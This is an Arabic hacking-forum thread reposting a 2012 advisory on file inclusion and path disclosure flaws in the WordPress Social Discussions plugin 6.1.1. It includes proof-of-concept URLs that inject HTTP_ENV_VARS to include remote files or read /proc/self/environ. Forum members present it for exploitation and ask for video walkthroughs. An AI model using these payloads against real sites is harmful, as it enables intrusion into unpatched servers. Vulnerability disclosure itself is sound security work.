ثـغرة الورد بريس : Wordpress Social Discussions Plugin 6.1.1 Multiple Vulnerabilities

[MhWy]

ثـغرة الورد بريس : Wordpress Social Discussions Plugin 6.1.1 Multiple Vulnerabilities

السسلام عليكم وحمة الله وبركـاتةة
جديد ثغرات الوورد بريس

الثغرة تستغل بـ:
الكمد
رفع الشل برابط مباشر
الترجمةة بلغات
البيرل + البايثون

الكــود

كود:

[waraxe-2012-SA#093] - Multiple Vulnerabilities in Wordpress Social Discussions Plugin 
====================================================================================== 
 
Author: Janek Vind "waraxe" 
Date: 17. October 2012 
Location: Estonia, Tartu 
Web: http://www.waraxe.us/advisory-93.html 
 
 
Description of vulnerable target: 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
 
Enables Social Sharing of your blog posts to 30+ Social Networks. Plugin also 
enables you to Automatically Publish or Self Publish your Blog Posts to 25+  
Networks. 
 
http://wordpress.org/extend/plugins/social-discussions/ 
 
Affected version: 6.1.1 
 
############################################################################### 
1. Remote File Inclusion in "social-discussions-networkpub_ajax.php" 
############################################################################### 
 
Reasons: Uninitialized variable "$HTTP_ENV_VARS" 
Attack vectors: User-supplied parameter "HTTP_ENV_VARS" 
Preconditions: 
 1. register_globals=on 
 2. register_long_arrays=off 
 3. allow_url_include=on for RFI if PHP >= 5.2.0 
 4. PHP must be < 5.3.4 for LFI null-byte attacks 
 5. magic_quotes_gpc=off for LFI null-byte attacks 
 
 
Php script "social-discussions-networkpub_ajax.php" line 2: 
------------------------[ source code start ]---------------------------------- 
if (!function_exists('add_action')){ 
  @include_once($GLOBALS['HTTP_ENV_VARS']['DOCUMENT_ROOT'] . "/wp-config.php"); 
------------------------[ source code end ]------------------------------------ 
 
We can see, that script expects old-style array "HTTP_ENV_VARS" to be initialized 
and containing "DOCUMENT_ROOT" entry. But it appears, that if PHP directive 



"register_long_arrays=off", then "HTTP_ENV_VARS" is uninitialized and if in 
same time "register_globals=on", it is possible to fill that array with any 
value, leading to the RFI (Remote File Inclusion) vulnerability. 
 
 
Tests: 
 
http://localhost/wp342/wp-content/plugins/social-discussions/social-discussions-networkpub_ajax.php?HTTP_ENV_VARS[DOCUMENT_ROOT]=http://php.net/? 
 
http://localhost/wp342/wp-content/plugins/social-discussions/social-discussions-networkpub_ajax.php?HTTP_ENV_VARS[DOCUMENT_ROOT]=/proc/self/environ%00z 
 
 
############################################################################### 
2. Full Path Disclosure in multiple scripts 
############################################################################### 
 
Reasons: Direct request to php script triggers pathname leak in error message 
Preconditions: PHP directive display_errors=on 
Result: Information Exposure Through an Error Message 
 
Tests: 
 
http://localhost/wp342/wp-content/plugins/social-discussions/social-discussions-networkpub.php 
 
Fatal error: Call to undefined function __() in 
C:\apache_www\wp342\wp-content\plugins\social-discussions\social-discussions-networkpub.php on line 2 
 
http://localhost/wp342/wp-content/plugins/social-discussions/social-discussions.php 
 
Fatal error: Call to undefined function __() in 
C:\apache_www\wp342\wp-content\plugins\social-discussions\social-discussions-networkpub.php on line 2 
 
http://localhost/wp342/wp-content/plugins/social-discussions/social_discussions_service_names.php 
 
Fatal error: Call to undefined function __() in 
C:\apache_www\wp342\wp-content\plugins\social-discussions\social_discussions_service_names.php on line 3 
 
 
 
Contact: 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
 
come2waraxe@yahoo.com 
Janek Vind "waraxe" 
 
Waraxe forum:  http://www.waraxe.us/forums.html 
Personal homepage: http://www.janekvind.com/ 
Random project: http://albumnow.com/ 
---------------------------------- [ EOF ] ------------------------------------

أي استفسار انا جاهز
بالتوفيق

المصدر: development-point - للمزيد تابع : قسم الثغـرات

---

eJyvm hg,v] fvds : Wordpress Social Discussions Plugin 6>1>1 Multiple Vulnerabilities

[اسطوره هكر]

مشكور اخوي لاكن لو سويت شرح فديو وطبقت الثغرة يكون .ماقصرت

[MhWy]

	المشاركة الأصلية كتبت بواسطة اسطوره هكر

	مشكور اخوي لاكن لو سويت شرح فديو وطبقت الثغرة يكون .ماقصرت

قريبـا ان شاء الله حبيبي
منور

[Abdou-90]

يسلموا يا الغالي
وفي انتظار الفيديو

[نقــِـِـِــِآءْ . .]

	المشاركة الأصلية كتبت بواسطة اسطوره هكر

	مشكور اخوي لاكن لو سويت شرح فديو وطبقت الثغرة يكون .ماقصرت

الثغره سهله ..
السكربت ورد بريس
الثغره lfi عرض يوزرات .
الملف : social-discussions-networkpub_ajax.php
الاستغلال مثلا :
http://localhost/wp342/wp-content/pl...?HTTP_ENV_VARS[DOCUMENT_ROOT]=/proc/self/environ%00z


شكرا صاحب الموضوع .. ومبارك العيد

[MhWy]

	المشاركة الأصلية كتبت بواسطة نقــِـِـِــِآءْ . .

	الثغره سهله .. السكربت ورد بريس الثغره lfi عرض يوزرات . الملف : social-discussions-networkpub_ajax.php الاستغلال مثلا : http://localhost/wp342/wp-content/pl...?http_env_vars[document_root]=/proc/self/environ%00z شكرا صاحب الموضوع .. ومبارك العيد

يعطيك العافيةة
اختصار عضيم جدا جدا
شكرا ع المساعده ورفع هم الفيديو ض2
منورين الكل

[jn3e]

حلو حبي جدا ممتاز

[مثنى هكر العراق]

شكرا عزيزي بس لو فيديو كان احسن

[GENERAL AMERICA]

عاشت ايدك حبيبي

[α.Ł.G.Ё.Ŗ.M.Ă.N.Y]

عاشت ايدك حبيبي